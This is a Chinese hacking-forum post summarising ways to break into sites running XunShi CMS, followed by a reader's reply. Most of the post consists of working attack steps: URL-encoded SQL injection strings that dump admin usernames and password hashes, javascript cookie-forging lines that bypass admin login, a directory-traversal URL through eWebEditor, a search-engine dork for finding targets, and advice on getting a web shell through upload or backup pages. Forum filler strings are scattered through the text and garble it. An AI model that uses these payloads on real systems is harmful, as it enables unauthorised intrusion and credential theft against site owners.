找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3059|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘
8 T+ F& c- Y7 k1 V8 k
5 [/ L# \/ w- ^3 F! r8 R在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)) M1 N9 B* V! g
% _5 m( a( p& f8 \$ _
以下本文总结来自黑防去年第9期杂志上的内容...) i4 Z3 A% g5 S
  k7 F. r( ~' R! f6 k! Y. Q
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%4 C3 `! M; s& D: x! }' b

4 n$ W3 p0 j( j7 j4 i/ o: p26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2 - f/ ]* K9 ?, S2 H! j% l
6 l9 D( ^3 z' e$ {5 {* \! \9 ~6 V2 ?
记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况4 p; I& H+ ?! J9 a
这里一个注入
6 o; H7 w* k1 I4 f$ z
* J! Q- X( w. N4 g8 f7 N效果如图:
% l4 a. f  k# v2 W3 D
1 ?1 L! W$ Q* S' S  ~* I
# C$ H' N& R2 o9 y0 y3 Y/ z& v5 e# R1 D0 C# I; f
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
/ B! r# F2 U5 X# S  U1 S& I. c8 a$ k4 G4 ?
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
" m1 L4 q8 H3 n4 @( B5 ]1 Q
6 v0 V4 N/ `& j# b4 u4 d: sjavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));* S. v! T+ F  U( r$ i" g; x( y+ f

& c8 h" z/ e8 [' K2 q那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:  E! Q# P9 J7 }$ \; l+ j. K
% r/ e" `( M2 S! f, f# [/ y
因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
- m9 N% A( m$ H) V& C' u& P& J% l  J. T5 t
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以( o% p; A; y  `8 y1 k6 c. z
# g! M2 i7 J# C, h! Z
访问这页面来列目录..步骤如下:
% A, y0 ~& o& ]- c* A3 K  G$ f& q8 k% y  E
javascript:alert(document.cookie="admindj=1") $ ?1 K1 p% I3 E0 B7 M, ~: s: N

( m. ~8 s3 p: hhttp://www.political-security.co ... asp?id=46&dir=../..
9 Q; \) k, p! `8 d/ y# D1 [$ a0 ^" s1 _! x
效果如图:0 i) [2 }" \1 G; k8 t" t9 w2 N
$ _4 C3 w& d6 O+ b/ ]

1 }, q0 X4 d3 m; C  Z- H) N; E. U
这样全站目录都能瞧了..找到后台目录..进去..
$ X1 u7 q, g* [, S& `! s5 h! q7 }8 T$ r7 I" l
那么进了后台怎么拿shell??上传--备份就ok了..3 `+ x, C  F/ C9 D3 q4 q

: ]  U) i% W# w9 H3 @那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
, l: k3 F. a/ l
' S# r8 d; m+ q' l3 d这个我也碰到过一次..你都可以通过列目录来实现..7 A) r+ {3 ~) \" s7 l, s# x# O8 l
8 ]' R1 V; J1 U9 L- v9 W& I
javascript:alert(document.cookie="admindj=1")
+ V2 d  J7 O2 b5 {3 H) O5 e- F* ^& t
http://www.political-security.co ... p?action=BackupData * N& X) a# y8 W# P  ^# D

/ z# `9 u# O- x  O  N) o7 c: `备份ok..
3 m# |  {) @' Z9 _% Z; S2 ~/ S1 f
3 u8 |  X- ~) q7 U" Z- Q那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
2 C. Z' t2 S& z1 h" p* i, E# I3 S1 E, p) C- V
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
' T" I' y  @, X. e4 Y
2 Q8 i+ C* s4 B) r% s# K然后访问此页面进行注入..步骤如下:! X1 t0 X; f2 {/ C5 ^
) z  I3 L$ N% c, @3 h1 b
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
+ g. A5 q9 L2 T5 I$ D+ d: E9 Q* q* p7 u# H5 A# w1 x
然后请求admin/admin_chk.asp页面& B! g' f, s$ e+ {
7 T2 F: f) a8 e
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%: n+ W, L* x0 {5 d$ \- j5 b& X
: @2 D: Y$ Y' T% X8 U. [
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
$ l1 n% V' X/ v5 o4 [
$ b. F/ v* b; y. U效果如图所示:6 P0 d# E! t, `, c3 c) V
+ s, ]9 T! H/ q& R: a/ b9 L

7 T+ z; Z- {& B6 }' i2 w* M
' u9 Y$ O8 c: s; D& F' E/ q/ j$ T讯时漏洞29 O, I) |. `8 \3 B  i  G
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)9 u6 S* E( T5 [- `* c, o9 V* N8 Q
: z! ^" x# d: l8 d
1、/admin/admin_news_pl_view.asp?id=1
4 @4 s# n9 t9 A1 v//id任意 填入以下语句" n: A' x6 a4 Z! Q+ z
$ v. b8 T- c' X. `
2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
- g: B7 U) K; F: v 8 N; U1 c/ N" t, O  a( x' E5 ?

; H& E$ E/ R. h$ O5 Z( S
3 j) q6 i% \% @( j3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
" j# S! W! D) l# ~
* d9 [6 i1 f" P7 ^  {' ?- m/ ]$ x& c7 r4 L* q

. i7 u2 r) u" N6 K/ ?/ ]爆出管理员帐号和密码了, b( x: s. N8 i% F* E

$ e" ]% O( F5 ]1 i& C
  U6 M+ p$ H; m- O: c3 D8 }
0 e+ E( z% [1 ?  K4、cookies进后台
0 K' a8 ~- q: _* a, b
4 T( y4 b" S7 qjavascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));6 ^, J3 E& c* k2 r
/ S3 y& r3 A: H- H& O! _
  m5 Q  K5 o  \# s

- C4 W- O( O4 G7 |4 H  K2 s5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
* k3 ^* j" s  O# y 6 x$ G5 g1 W: m1 L$ E* N: m

- Q' j% Y. `2 v
  v4 w6 m0 A) R& {5 P6、后台有上传和备份取SHELL不难。. e4 U' D$ ]/ E" K, O

' u2 @$ X3 A! c7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..
9 i) x1 o  R8 |4 ~
0 ]  U: ]% a2 g. {8 w; T" Z逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!
9 l; c% D8 b1 L9 D9 L  u
) \. a6 s$ x- Q$ U( L8 W8 U0 D! t
* E* d: Q' `" l; G5 b/ @
: E! y7 p- B% v' q1 A
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表